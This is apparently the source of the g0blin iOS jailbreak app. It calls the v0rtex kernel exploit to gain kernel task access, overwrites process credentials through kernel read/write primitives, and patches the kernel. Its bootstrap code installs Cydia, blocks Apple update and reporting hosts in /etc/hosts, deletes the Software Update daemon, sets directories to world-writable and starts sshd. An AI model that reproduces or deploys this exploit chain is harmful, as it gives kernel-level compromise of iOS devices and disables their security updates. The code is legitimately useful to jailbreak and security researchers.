*playerController; 59 | @property (nonatomic, strong) NSTimer *meterUpdateTimer; 60 | @property (nonatomic, assign) CPUSample lastCPUSample; 61 | @property (nonatomic, strong) NSMutableArray *cpuHistory; 62 | @property (nonatomic, strong) BEMSimpleLineGraphView *cpuGraph; 63 | @end 64 | 65 | 66 | task_t tfp0 = 0; 67 | 68 | uint64_t kslide = 0; 69 | uint64_t kern_cred = 0; 70 | uint64_t self_cred = 0; 71 | uint64_t self_proc = 0; 72 | 73 | 74 | @implementation ViewController 75 | 76 | - (void)viewDidLoad { 77 | [super viewDidLoad]; 78 | 79 | self.jailbroken = NO; 80 | self.fun = NO; 81 | self.needsReboot = NO; 82 | 83 | self.goButton.layer.cornerRadius = 16; 84 | self.consoleView.layer.cornerRadius = 6; 85 | self.consoleView.text = nil; 86 | 87 | self.cpuMeterLabel.text = @"_"; 88 | self.ramMeterLabel.text = @"_"; 89 | 90 | [self setupGraph]; 91 | 92 | // setup fun trigger 93 | self.logoView.userInteractionEnabled = YES; 94 | UITapGestureRecognizer *tripleTap = [[UITapGestureRecognizer alloc] initWithTarget:self action:@selector(fun:)]; 95 | tripleTap.delaysTouchesBegan = YES; 96 | tripleTap.numberOfTapsRequired = 3; 97 | [self.logoView addGestureRecognizer:tripleTap]; 98 | 99 | // print device info 100 | struct utsname u; 101 | uname(&u); 102 | [self log:[NSString stringWithFormat:@"%s \n", u.version]]; 103 | [self log:[NSString stringWithFormat:@"H/W: %s", u.machine]]; 104 | [self log:[NSString stringWithFormat:@"S/W: %@ \n", [[NSProcessInfo processInfo] operatingSystemVersionString]]]; 105 | 106 | // abort if already jailbroken 107 | if (strstr(u.version, "MarijuanARM")) { 108 | self.jailbroken = YES; 109 | self.goButton.enabled = NO; 110 | self.goButton.backgroundColor = UIColor.darkGrayColor; 111 | [self.goButton setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 112 | [self log:@"Enjoy! \n"]; 113 | return; 114 | } 115 | 116 | // check if device is supported 117 | if (init_offsets() == KERN_SUCCESS) { 118 | [self log:@"Ready. \n"]; 119 | } else { 120 | self.goButton.enabled = NO; 121 | self.goButton.backgroundColor = UIColor.darkGrayColor; 122 | [self.goButton setTitle:@"device not supported" forState:UIControlStateDisabled]; 123 | } 124 | } 125 | 126 | - (void)viewDidAppear:(BOOL)animated { 127 | [super viewDidAppear:animated]; 128 | 129 | LOG("Starting Meters !!!"); 130 | [self startUpdating]; 131 | } 132 | 133 | - (void)viewDidDisappear:(BOOL)animated { 134 | [super viewDidDisappear:animated]; 135 | 136 | LOG("Stopping Meters"); 137 | [self stopUpdating]; 138 | } 139 | 140 | - (void)didReceiveMemoryWarning { 141 | [super didReceiveMemoryWarning]; 142 | // Dispose of any resources that can be recreated. 143 | 144 | // make SURE the timer is dead. 145 | [_meterUpdateTimer invalidate]; 146 | _meterUpdateTimer = nil; 147 | } 148 | 149 | - (void)dealloc { 150 | // make SURE the timer is dead. 151 | [_meterUpdateTimer invalidate]; 152 | _meterUpdateTimer = nil; 153 | } 154 | 155 | 156 | #pragma mark - jailbreak 157 | 158 | - (void)log:(NSString *)text { 159 | self.consoleView.text = [NSString stringWithFormat:@"%@%@ \n", self.consoleView.text, text]; 160 | } 161 | 162 | - (IBAction)go:(UIButton *)sender { 163 | [self stopUpdating]; 164 | 165 | self.goButton.enabled = NO; 166 | self.goButton.backgroundColor = UIColor.darkGrayColor; 167 | 168 | if (self.needsReboot) { 169 | [self.goButton setTitle:@"rebooting" forState:UIControlStateDisabled]; 170 | [self log:@"rebooting..."]; 171 | } else { 172 | [self.goButton setTitle:@"jailbreaking" forState:UIControlStateDisabled]; 173 | [self log:@"exploiting kernel..."]; 174 | } 175 | 176 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0), ^{ 177 | kern_return_t ret = v0rtex(&tfp0, &kslide, &kern_cred, &self_cred, &self_proc); 178 | if (ret != KERN_SUCCESS) { 179 | dispatch_async(dispatch_get_main_queue(), ^{ 180 | [self log:@"ERROR: exploit failed :( \n\n"]; 181 | [self log:@"Please reboot and try again. \n"]; 182 | 183 | self.needsReboot = YES; 184 | 185 | [self.goButton setTitle:@"failed, reboot" forState:UIControlStateNormal]; 186 | self.goButton.backgroundColor = GRAPE; 187 | self.goButton.enabled = YES; 188 | }); 189 | return; 190 | } 191 | LOG("***** v0rtex was successful *****"); 192 | LOG("tfp0 -> %x", tfp0); 193 | LOG("slide -> 0x%llx", kslide); 194 | LOG("kern_cred -> 0x%llx", kern_cred); 195 | LOG("self_cred -> 0x%llx", self_cred); 196 | LOG("self_proc -> 0x%llx", self_proc); 197 | LOG("***********************************"); 198 | 199 | dispatch_async(dispatch_get_main_queue(), ^{ 200 | //[self unjail]; 201 | [self performSelector:@selector(unjail) withObject:nil afterDelay:1]; 202 | }); 203 | }); 204 | } 205 | 206 | - (void)unjail { 207 | [self log:@"patching kernel..."]; 208 | 209 | if (do_unjail(tfp0, kslide, kern_cred, self_cred, self_proc) == KERN_SUCCESS) { 210 | LOG("♬ you done with kpp? yeah you know me ♬"); 211 | [self remount]; 212 | } else { 213 | [self log:@"ERROR: kpp bypass failed \n"]; 214 | } 215 | } 216 | 217 | - (void)remount { 218 | [self log:@"remounting..."]; 219 | 220 | if (do_remount(kslide) == KERN_SUCCESS) { 221 | [self bootstrap]; 222 | } else { 223 | [self log:@"ERROR: failed to remount system partition \n"]; 224 | } 225 | } 226 | 227 | - (void)bootstrap { 228 | [self log:@"bootstrapping..."]; 229 | 230 | if (do_bootstrap() == KERN_SUCCESS) { 231 | [self finish]; 232 | } else { 233 | [self log:@"ERROR: failed to bootstrap \n"]; 234 | } 235 | } 236 | 237 | - (void)finish { 238 | [self log:@"device is now jailbroken !!"]; 239 | [self log:@""]; 240 | [self log:@"restarting SpringBoard..."]; 241 | [self log:@""]; 242 | 243 | [self.goButton setTitle:@"finishing" forState:UIControlStateDisabled]; 244 | 245 | LOG("killing backboardd..."); 246 | gsystem("(killall backboardd)&"); 247 | 248 | LOG("restoring our creds"); 249 | WriteAnywhere64(self_proc + offset_p_cred, self_cred); 250 | } 251 | 252 | 253 | #pragma mark - fun 254 | 255 | - (IBAction)fun:(UITapGestureRecognizer *)recognizer { 256 | LOG("got secret tap 3"); 257 | 258 | if (self.fun == NO) { 259 | 260 | BOOL hasAudio = [AVAudioSession.sharedInstance setCategory:AVAudioSessionCategoryPlayback error:nil]; 261 | if (!hasAudio) { 262 | LOG("no audio :/"); 263 | } 264 | 265 | NSURL *url = [NSBundle.mainBundle URLForResource:@"y0nkers" withExtension:@"m4v"]; 266 | LOG("url = %@", url); 267 | if (!url) { 268 | LOG("filenotfound"); 269 | return; 270 | } 271 | 272 | self.playerController = [[AVPlayerViewController alloc] init]; 273 | self.playerController.view.frame = self.consoleView.bounds; 274 | self.playerController.showsPlaybackControls = YES; 275 | self.playerController.updatesNowPlayingInfoCenter = YES; 276 | self.playerController.player = [AVPlayer playerWithURL:url]; 277 | 278 | [self.consoleView addSubview:self.playerController.view]; 279 | [self.playerController.player play]; 280 | 281 | self.logoView.image = [UIImage imageNamed:@"logo-lit"]; 282 | 283 | self.fun = YES; 284 | 285 | } else { 286 | [self.playerController.player pause]; 287 | [self.playerController.view removeFromSuperview]; 288 | self.playerController.player = nil; 289 | self.playerController = nil; 290 | 291 | self.logoView.image = [UIImage imageNamed:@"logo"]; 292 | 293 | self.fun = NO; 294 | } 295 | } 296 | 297 | 298 | #pragma mark - meters 299 | 300 | - (void)startUpdating { 301 | // bail if the meters are already running 302 | if ([self.meterUpdateTimer isValid]) { 303 | LOG("meters are already running, no need to start them again"); 304 | return; 305 | } 306 | 307 | // get new starting measurements 308 | self.lastCPUSample = [self getCPUSample]; 309 | 310 | // start timer 311 | self.meterUpdateTimer = [NSTimer timerWithTimeInterval:UPDATE_INTERVAL target:self 312 | selector:@selector(updateMeters:) 313 | userInfo:nil 314 | repeats:YES]; 315 | [[NSRunLoop mainRunLoop] addTimer:self.meterUpdateTimer forMode:NSRunLoopCommonModes]; 316 | LOG("Started Timer ••••• (%@)", self.meterUpdateTimer); 317 | } 318 | 319 | - (void)stopUpdating { 320 | if (self.meterUpdateTimer) { 321 | LOG("Stopping Timer ••••• (%@)", self.meterUpdateTimer); 322 | [self.meterUpdateTimer invalidate]; 323 | self.meterUpdateTimer = nil; 324 | 325 | // show meter placeholders 326 | self.cpuMeterLabel.text = @"_"; 327 | self.ramMeterLabel.text = @"_"; 328 | 329 | // reset graph 330 | for (int i=0; i GRAPH_MAX_POINTS) { 367 | [self.cpuHistory removeObjectAtIndex:0]; 368 | } 369 | [self.cpuGraph reloadGraph]; 370 | } 371 | 372 | - (uint32_t)memoryAvailableInBytes { 373 | // I'm counting "available" as free + inactive memory 374 | 375 | uint32_t bytesAvailable = 0; 376 | 377 | // get page size 378 | vm_size_t pagesize = vm_kernel_page_size; 379 | //NSLog(@"[Meters] using page size: %d bytes", (int)pagesize); 380 | 381 | // get stats 382 | kern_return_t kr; 383 | mach_msg_type_number_t count = HOST_VM_INFO_COUNT; 384 | vm_statistics_data_t vm_stat; 385 | 386 | kr = host_statistics(mach_host_self(), HOST_VM_INFO, (host_info_t)&vm_stat, &count); 387 | if (kr != KERN_SUCCESS) { 388 | LOG("Error getting VM_INFO from host!"); 389 | } else { 390 | unsigned long bytesInactive = vm_stat.inactive_count * pagesize; 391 | unsigned long bytesFree = vm_stat.free_count * pagesize; 392 | bytesAvailable = (uint32_t)(bytesFree + bytesInactive); 393 | //LOG(@"Got RAM stats: Free=%lu B; Inactive=%lu B; Total Available=%u B", bytesFree, bytesInactive, bytesAvailable); 394 | } 395 | return bytesAvailable; 396 | } 397 | 398 | - (CPUSample)getCPUSample { 399 | /* 400 | CPUSample: { totalUserTime, totalSystemTime, totalIdleTime } 401 | */ 402 | CPUSample sample = {0, 0, 0}; 403 | 404 | kern_return_t kr; 405 | mach_msg_type_number_t count; 406 | host_cpu_load_info_data_t r_load; 407 | 408 | count = HOST_CPU_LOAD_INFO_COUNT; 409 | kr = host_statistics(mach_host_self(), HOST_CPU_LOAD_INFO, (int *)&r_load, &count); 410 | 411 | if (kr != KERN_SUCCESS) { 412 | LOG("Error fetching HOST_CPU_LOAD_INFO !"); 413 | } else { 414 | sample.totalUserTime = r_load.cpu_ticks[CPU_STATE_USER] + r_load.cpu_ticks[CPU_STATE_NICE]; 415 | sample.totalSystemTime = r_load.cpu_ticks[CPU_STATE_SYSTEM]; 416 | sample.totalIdleTime = r_load.cpu_ticks[CPU_STATE_IDLE]; 417 | //LOG(@"got CPU sample [ user:%llu; sys:%llu; idle:%llu ]", sample.totalUserTime, sample.totalSystemTime, sample.totalIdleTime); 418 | } 419 | return sample; 420 | } 421 | 422 | - (uint64_t)timestamp { 423 | 424 | // get timer units 425 | mach_timebase_info_data_t info; 426 | mach_timebase_info(&info); 427 | 428 | // get timer value 429 | uint64_t timestamp = mach_absolute_time(); 430 | 431 | // convert to nanoseconds 432 | timestamp *= info.numer; 433 | timestamp /= info.denom; 434 | 435 | return timestamp; 436 | } 437 | 438 | - (NSString *)formatBytes:(double)bytes { 439 | NSString *result; 440 | 441 | if (bytes > (1024*1024*1024)) { // G 442 | result = [NSString stringWithFormat:@"%.1f GB/s", bytes/1024/1024/1024]; 443 | } else if (bytes > (1024*1024)) { // M 444 | result = [NSString stringWithFormat:@"%.1f MB/s", bytes/1024/1024]; 445 | } else if (bytes > 1024) { // K 446 | result = [NSString stringWithFormat:@"%.1f KB/s", bytes/1024]; 447 | } else if (bytes > 0 ) { 448 | result = [NSString stringWithFormat:@"%.0f B/s", bytes]; 449 | } else { 450 | result = @"0"; 451 | } 452 | 453 | return result; 454 | } 455 | 456 | 457 | #pragma mark - graph 458 | 459 | - (void)setupGraph { 460 | // seed graph data with zeros 461 | self.cpuHistory = [NSMutableArray array]; 462 | for (int i=0; i 11 | #include 12 | 13 | kern_return_t do_bootstrap(void); 14 | -------------------------------------------------------------------------------- /g0blin/bootstrap.m: -------------------------------------------------------------------------------- 1 | // 2 | // bootstrap.m 3 | // g0blin 4 | // 5 | // Install Cydia if necessary then bootstrap. 6 | // 7 | // Created by Sticktron on 2017-12-27. 8 | // Copyright © 2017 Sticktron. All rights reserved. 9 | // Copyright © 2017 qwertyoruiop. All rights reserved. 10 | // 11 | 12 | #import "common.h" 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | extern int (*gsystem)(const char *); 19 | 20 | 21 | kern_return_t do_bootstrap() { 22 | 23 | #pragma mark - Cleanup 24 | 25 | /* Make sure these get deleted */ 26 | 27 | unlink("/.installed_g0blin"); 28 | unlink("/.installed_g0blin_rc0"); 29 | unlink("/.installed_g0blin_rc1"); 30 | unlink("/.installed_g0blin_rc2"); 31 | 32 | unlink("/usr/libexec/reload"); 33 | unlink("/Library/LaunchDaemons/0.reload.plist"); 34 | 35 | 36 | /* Make sure these get updated */ 37 | 38 | unlink("/bin/launchctl"); 39 | NSString *launchctl = [[NSBundle mainBundle] URLForResource:@"launchctl" withExtension:@""].path; 40 | copyfile([launchctl UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); 41 | chmod("/bin/launchctl", 0755); 42 | 43 | 44 | /* Do this again everytime because it isn't sticking for some people */ 45 | 46 | gsystem("killall -SIGSTOP cfprefsd"); 47 | NSMutableDictionary *plist = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/private/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 48 | [plist setObject:@YES forKey:@"SBShowNonDefaultSystemApps"]; 49 | [plist writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 50 | gsystem("killall -9 cfprefsd"); 51 | 52 | 53 | 54 | #pragma mark - Install Cydia? 55 | 56 | if (![[NSFileManager defaultManager] fileExistsAtPath:@"/Applications/Cydia.app/"]) { 57 | LOG("installing Cydia..."); 58 | 59 | // copy launchctl 60 | unlink("/bin/launchctl"); 61 | NSString *launchctl = [[NSBundle mainBundle] URLForResource:@"launchctl" withExtension:@""].path; 62 | copyfile([launchctl UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); 63 | chmod("/bin/launchctl", 0755); 64 | 65 | // copy tar 66 | unlink("/bin/tar"); 67 | NSString *tar = [[NSBundle mainBundle] URLForResource:@"tar" withExtension:@""].path; 68 | copyfile([tar UTF8String], "/bin/tar", 0, COPYFILE_ALL); 69 | chmod("/bin/tar", 0755); 70 | 71 | // unpack bootstrap.tar 72 | NSString *bootstrap = [[NSBundle mainBundle] URLForResource:@"bootstrap" withExtension:@"tar"].path; 73 | pid_t pid; 74 | posix_spawn(&pid, "/bin/tar", 0, 0, (char**)&(const char*[]){"/bin/tar", "--preserve-permissions", "--no-overwrite-dir", "-C", "/", "-xvf", [bootstrap UTF8String], NULL}, NULL); 75 | waitpid(pid, 0, 0); 76 | LOG("unpacked bootstrap "); 77 | 78 | // DO NOT USE TRADITIONAL STASHING !!! 79 | open("/.cydia_no_stash", O_RDWR|O_CREAT, 0644); 80 | 81 | // run Cydia install scripts 82 | LOG("running Cydia extrainst scripts..."); 83 | gsystem("/var/lib/dpkg/info/base.extrainst_"); 84 | gsystem("/var/lib/dpkg/info/firmware-sbin.extrainst_"); 85 | gsystem("/var/lib/dpkg/info/uikittools.extrainst_"); 86 | gsystem("/var/lib/dpkg/info/com.saurik.patcyh.extrainst_"); 87 | 88 | // modify hosts (don't phone home) 89 | gsystem("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); 90 | gsystem("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); 91 | 92 | // modify hosts (block Software Update) 93 | gsystem("echo '127.0.0.1 mesu.apple.com' >> /etc/hosts"); 94 | 95 | // rebuild icon cache 96 | LOG("running uicache..."); 97 | gsystem("su -c uicache mobile"); 98 | 99 | LOG("finished installing bootstrap"); 100 | } 101 | LOG("Cydia is installed"); 102 | 103 | #pragma mark - Finish 104 | 105 | 106 | // permissions fix 107 | chmod("/private", 0777); 108 | chmod("/private/var", 0777); 109 | chmod("/private/var/mobile", 0777); 110 | chmod("/private/var/mobile/Library", 0777); 111 | chmod("/private/var/mobile/Library/Preferences", 0777); 112 | 113 | // kill Software Update 114 | gsystem("launchctl unload /System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); 115 | unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); 116 | gsystem("launchctl kill 9 system/com.apple.mobile.softwareupdated"); 117 | LOG("killed Software Update"); 118 | 119 | // kill OTA updater 120 | gsystem("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); 121 | LOG("killed OTA updater"); 122 | 123 | // load user launch daemons; do run commands 124 | LOG("launching user daemons..."); 125 | gsystem("ls /Library/LaunchDaemons | while read a; do launchctl load /Library/LaunchDaemons/$a; done;"); 126 | gsystem("for file in /etc/rc.d/*; do $file; done;"); 127 | 128 | // OpenSSH launch workaround (won't load via launchdaemon) 129 | gsystem("launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist;/usr/libexec/sshd-keygen-wrapper"); 130 | 131 | LOG("finished bootstrapping."); 132 | 133 | return KERN_SUCCESS; 134 | } 135 | -------------------------------------------------------------------------------- /g0blin/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/bootstrap.tar -------------------------------------------------------------------------------- /g0blin/common.h: -------------------------------------------------------------------------------- 1 | // v0rtex 2 | // Bug by Ian Beer. 3 | // Exploit by Siguza. 4 | 5 | #import 6 | #include // uint*_t 7 | 8 | 9 | #ifdef __LP64__ 10 | # define ADDR "0x%016llx" 11 | typedef uint64_t kptr_t; 12 | #else 13 | # define ADDR "0x%08x" 14 | typedef uint32_t kptr_t; 15 | #endif 16 | 17 | #define LOG(str, args...) do { NSLog(@str "\n", ##args); } while(0) 18 | 19 | /* Re-direct LOG macro to GUI */ 20 | //#include "ViewController.h" 21 | //extern id controller; 22 | //#define LOG(str, args...) do { \ 23 | // if (controller && [controller respondsToSelector:@selector(log:)]) { \ 24 | // if ([NSThread isMainThread]) { \ 25 | // [controller log:[NSString stringWithFormat:@str "\n", ##args]]; \ 26 | // } else { \ 27 | // [controller performSelectorOnMainThread:@selector(log:) withObject:[NSString stringWithFormat:@str "\n", ##args] waitUntilDone:NO]; \ 28 | // } \ 29 | // } else { \ 30 | // NSLog(@str "\n", ##args); \ 31 | // } \ 32 | //} while(0) 33 | -------------------------------------------------------------------------------- /g0blin/kernel.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.h 3 | // g0blin 4 | // 5 | // Created by Ben (@PsychoTea) on 16/12/2017. 6 | // 7 | 8 | #include 9 | 10 | void init_kernel(task_t tfp0); 11 | size_t tfp0_kread(uint64_t where, void *p, size_t size); 12 | uint64_t rk64(uint64_t kaddr); 13 | uint32_t rk32(uint64_t kaddr); 14 | void wk64(uint64_t kaddr, uint64_t val); 15 | void wk32(uint64_t kaddr, uint32_t val); 16 | size_t kwrite(uint64_t where, const void *p, size_t size); 17 | size_t kwrite_uint64(uint64_t where, uint64_t value); 18 | size_t kwrite_uint32(uint64_t where, uint32_t value); 19 | 20 | 21 | kern_return_t mach_vm_write(vm_map_t target_task, 22 | mach_vm_address_t address, 23 | vm_offset_t data, 24 | mach_msg_type_number_t dataCnt); 25 | 26 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, 27 | mach_vm_address_t address, 28 | mach_vm_size_t size, 29 | mach_vm_address_t data, 30 | mach_vm_size_t *outsize); 31 | 32 | kern_return_t mach_vm_allocate(vm_map_t, mach_vm_address_t *, mach_vm_size_t, int); 33 | -------------------------------------------------------------------------------- /g0blin/kernel.m: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.m 3 | // g0blin 4 | // 5 | // Created by Ben (@PsychoTea) on 16/12/2017. 6 | // 7 | 8 | #import "kernel.h" 9 | #import "common.h" 10 | #include 11 | 12 | static task_t tfp0; 13 | 14 | void init_kernel(task_t task_for_port0) { 15 | tfp0 = task_for_port0; 16 | } 17 | 18 | size_t tfp0_kread(uint64_t where, void *p, size_t size) 19 | { 20 | int rv; 21 | size_t offset = 0; 22 | while (offset < size) { 23 | mach_vm_size_t sz, chunk = 2048; 24 | if (chunk > size - offset) { 25 | chunk = size - offset; 26 | } 27 | rv = mach_vm_read_overwrite(tfp0, where + offset, chunk, (mach_vm_address_t)p + offset, &sz); 28 | 29 | if (rv || sz == 0) { 30 | break; 31 | } 32 | 33 | offset += sz; 34 | } 35 | return offset; 36 | } 37 | 38 | uint64_t rk64(uint64_t kaddr) { 39 | uint64_t lower = rk32(kaddr); 40 | uint64_t higher = rk32(kaddr + 4); 41 | return ((higher << 32) | lower); 42 | } 43 | 44 | uint32_t rk32(uint64_t kaddr) { 45 | kern_return_t err; 46 | uint32_t val = 0; 47 | mach_vm_size_t outsize = 0; 48 | 49 | // mach (for kern r/w primitives) 50 | kern_return_t mach_vm_write(vm_map_t target_task, 51 | mach_vm_address_t address, 52 | vm_offset_t data, 53 | mach_msg_type_number_t dataCnt); 54 | 55 | err = mach_vm_read_overwrite(tfp0, 56 | (mach_vm_address_t)kaddr, 57 | (mach_vm_size_t)sizeof(uint32_t), 58 | (mach_vm_address_t)&val, 59 | &outsize); 60 | 61 | if (err != KERN_SUCCESS) { 62 | // printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 63 | // sleep(3); 64 | return 0; 65 | } 66 | 67 | if (outsize != sizeof(uint32_t)) { 68 | // printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 69 | // sleep(3); 70 | return 0; 71 | } 72 | 73 | return val; 74 | } 75 | 76 | void wk64(uint64_t kaddr, uint64_t val) { 77 | uint32_t lower = (uint32_t)(val & 0xffffffff); 78 | uint32_t higher = (uint32_t)(val >> 32); 79 | wk32(kaddr, lower); 80 | wk32(kaddr + 4, higher); 81 | } 82 | 83 | void wk32(uint64_t kaddr, uint32_t val) { 84 | if (tfp0 == MACH_PORT_NULL) { 85 | // printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 86 | // sleep(3); 87 | return; 88 | } 89 | 90 | kern_return_t err; 91 | err = mach_vm_write(tfp0, 92 | (mach_vm_address_t)kaddr, 93 | (vm_offset_t)&val, 94 | (mach_msg_type_number_t)sizeof(uint32_t)); 95 | 96 | if (err != KERN_SUCCESS) { 97 | // printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 98 | return; 99 | } 100 | } 101 | 102 | 103 | size_t 104 | kread(uint64_t where, void *p, size_t size) 105 | { 106 | 107 | if(tfp0 == MACH_PORT_NULL) { 108 | printf("[ERROR]: tfp0's port is null!\n"); 109 | } 110 | 111 | int rv; 112 | size_t offset = 0; 113 | while (offset < size) { 114 | mach_vm_size_t sz, chunk = 2048; 115 | if (chunk > size - offset) { 116 | chunk = size - offset; 117 | } 118 | rv = mach_vm_read_overwrite(tfp0, where + offset, chunk, (mach_vm_address_t)p + offset, &sz); 119 | 120 | if (rv || sz == 0) { 121 | printf("[ERROR]: error reading buffer at @%p\n", (void *)(offset + where)); 122 | break; 123 | } 124 | offset += sz; 125 | } 126 | return offset; 127 | } 128 | 129 | uint64_t 130 | kread_uint64(uint64_t where) 131 | { 132 | uint64_t value = 0; 133 | size_t sz = kread(where, &value, sizeof(value)); 134 | return (sz == sizeof(value)) ? value : 0; 135 | } 136 | 137 | uint32_t 138 | kread_uint32(uint64_t where) 139 | { 140 | uint32_t value = 0; 141 | size_t sz = kread(where, &value, sizeof(value)); 142 | return (sz == sizeof(value)) ? value : 0; 143 | } 144 | 145 | 146 | size_t kwrite(uint64_t where, const void *p, size_t size) { 147 | int rv; 148 | size_t offset = 0; 149 | while (offset < size) { 150 | size_t chunk = 2048; 151 | if (chunk > size - offset) { 152 | chunk = size - offset; 153 | } 154 | rv = mach_vm_write(tfp0, 155 | where + offset, 156 | (mach_vm_offset_t)p + offset, 157 | (mach_msg_type_number_t)chunk); 158 | 159 | if (rv) { 160 | printf("[kernel] error copying buffer into region: @%p \n", (void *)(offset + where)); 161 | break; 162 | } 163 | 164 | offset +=chunk; 165 | } 166 | 167 | return offset; 168 | } 169 | 170 | size_t kwrite_uint64(uint64_t where, uint64_t value) { 171 | return kwrite(where, &value, sizeof(value)); 172 | } 173 | 174 | size_t kwrite_uint32(uint64_t where, uint32_t value) { 175 | return kwrite(where, &value, sizeof(value)); 176 | } 177 | -------------------------------------------------------------------------------- /g0blin/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/launchctl -------------------------------------------------------------------------------- /g0blin/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | #include 12 | 13 | int (*gsystem)(const char *) = 0; 14 | 15 | int main(int argc, char * argv[]) { 16 | @autoreleasepool { 17 | gsystem = dlsym(RTLD_DEFAULT,"system"); //thx tihmstar :) 18 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /g0blin/offsets.h: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | extern uint64_t OFFSET_ZONE_MAP; 13 | extern uint64_t OFFSET_KERNEL_MAP; 14 | extern uint64_t OFFSET_KERNEL_TASK; 15 | extern uint64_t OFFSET_REALHOST; 16 | extern uint64_t OFFSET_COPYIN; 17 | extern uint64_t OFFSET_COPYOUT; 18 | extern uint64_t OFFSET_IPC_PORT_ALLOC_SPECIAL; 19 | extern uint64_t OFFSET_IPC_KOBJECT_SET; 20 | extern uint64_t OFFSET_IPC_PORT_MAKE_SEND; 21 | extern uint64_t OFFSET_CHGPROCCNT; 22 | extern uint64_t OFFSET_KAUTH_CRED_REF; 23 | extern uint64_t OFFSET_OSSERIALIZER_SERIALIZE; 24 | extern uint64_t OFFSET_ROP_LDR_X0_X0_0x10; 25 | 26 | extern uint64_t OFFSET_ROOTVNODE; 27 | extern uint64_t OFFSET_BASE; 28 | 29 | // unused 30 | extern uint64_t OFFSET_BZERO; 31 | extern uint64_t OFFSET_BCOPY; 32 | extern uint64_t OFFSET_IOSURFACEROOTUSERCLIENT_VTAB; 33 | extern uint64_t OFFSET_ROP_ADD_X0_X0_0x10; 34 | 35 | 36 | kern_return_t init_offsets(void); 37 | -------------------------------------------------------------------------------- /g0blin/patchfinder64.h: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder64.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // Copyright © 2017 xerub. All rights reserved. 8 | // 9 | 10 | #ifndef PATCHFINDER64_H_ 11 | #define PATCHFINDER64_H_ 12 | 13 | #import "common.h" 14 | #include 15 | 16 | int init_patchfinder(task_t tfp0, uint64_t base, const char *filename); 17 | void term_kernel(void); 18 | 19 | enum { SearchInCore, SearchInPrelink }; 20 | 21 | uint64_t find_register_value(uint64_t where, int reg); 22 | uint64_t find_reference(uint64_t to, int n, int prelink); 23 | uint64_t find_strref(const char *string, int n, int prelink); 24 | uint64_t find_gPhysBase(void); 25 | uint64_t find_kernel_pmap(void); 26 | uint64_t find_amfiret(void); 27 | uint64_t find_ret_0(void); 28 | uint64_t find_amfi_memcmpstub(void); 29 | uint64_t find_sbops(void); 30 | uint64_t find_lwvm_mapio_patch(void); 31 | uint64_t find_lwvm_mapio_newj(void); 32 | 33 | uint64_t find_entry(void); 34 | const unsigned char *find_mh(void); 35 | 36 | uint64_t find_cpacr_write(void); 37 | uint64_t find_str(const char *string); 38 | uint64_t find_amfiops(void); 39 | uint64_t find_sysbootnonce(void); 40 | uint64_t find_trustcache(void); 41 | uint64_t find_amficache(void); 42 | 43 | uint64_t find_allproc(void); 44 | uint64_t find_sandbox_label_update(void); 45 | 46 | 47 | #endif 48 | -------------------------------------------------------------------------------- /g0blin/pte_stuff.h: -------------------------------------------------------------------------------- 1 | // 2 | // pte_stuff.h 3 | // g0blin 4 | // 5 | // Copyright © 2017 qwertyoruiop. All rights reserved. 6 | // 7 | 8 | #define TTE_INDEX_SHIFT 3 9 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 10 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 11 | #define TTE_GET(tte, mask) (tte & mask) 12 | #define TTE_SETB(tte, mask) tte = tte | mask 13 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 14 | #define TTE_IS_VALID_MASK 0x1 15 | #define TTE_IS_TABLE_MASK 0x2 16 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 17 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 18 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 19 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 20 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 21 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 